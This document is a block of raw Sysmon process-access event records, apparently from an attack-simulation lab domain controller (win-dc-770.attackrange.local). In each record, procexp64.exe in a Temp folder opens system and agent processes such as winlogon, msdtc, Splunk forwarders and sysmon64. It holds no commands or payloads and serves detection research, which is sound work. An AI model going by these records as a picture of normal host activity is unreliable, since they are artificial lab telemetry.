15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791487Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791486Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791485Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791484Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791483Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791482Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791481Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791480Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791479Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791478Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791477Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791476Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791475Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791474Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791473Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791472Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791471Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791470Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791469Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791468Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791467Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791466Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791465Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791464Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 